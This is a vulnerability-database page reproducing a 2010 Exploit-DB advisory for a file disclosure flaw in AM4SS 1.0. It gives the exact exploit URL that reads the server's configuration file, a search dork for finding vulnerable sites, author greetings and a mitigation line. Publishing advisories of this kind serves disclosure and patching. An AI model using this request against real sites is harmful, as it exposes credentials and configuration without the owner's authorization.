header-logo
Suggest Exploit
vendor:
AM4SS
by:
indoushka
7,5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: AM4SS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:am4ss:am4ss:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Advanced Management For Services Sites (File Disclosure) Vulnerabilities

A vulnerability exists in Advanced Management For Services Sites (AM4SS) which allows an attacker to disclose sensitive information such as configuration files. This is done by sending a specially crafted HTTP request to the vulnerable server which contains the path to the configuration file. The vulnerable parameter is ‘do’ which is located in the ‘am4ss/admincp/misc.php/login.php’ file. An example of the exploit is http://[site]/am4ss/admincp/misc.php/login.php?do=/includes/configure.php

Mitigation:

Upgrade to the latest version of AM4SS and ensure that all security patches are applied.
Source

Exploit-DB raw data:

======================================================================= 
# Advneced Management For Services Sites (File Disclosure) Vulnerabilities 
======================================================================= 

######################################################################## 
# Vendor: http://www.AM4SS.com/ 
# Date: 2010-05-27 
# Author : indoushka 
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
# Contact : indoushka@hotmail.com 
# Home : www.arab-blackhat.co.cc
# Dork : Powered by AM4SS 1.0 
# Bug  : File Disclosure 
# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
# File Disclosure : 

in : am4ss/admincp/misc.php/login.php?do= 

Exploit : am4ss/admincp/misc.php/login.php?do=/includes/configure.php 

Example : http://[site]/am4ss/admincp/misc.php/login.php?do=/includes/configure.php 


Dz-Ghost Team : Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel :
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N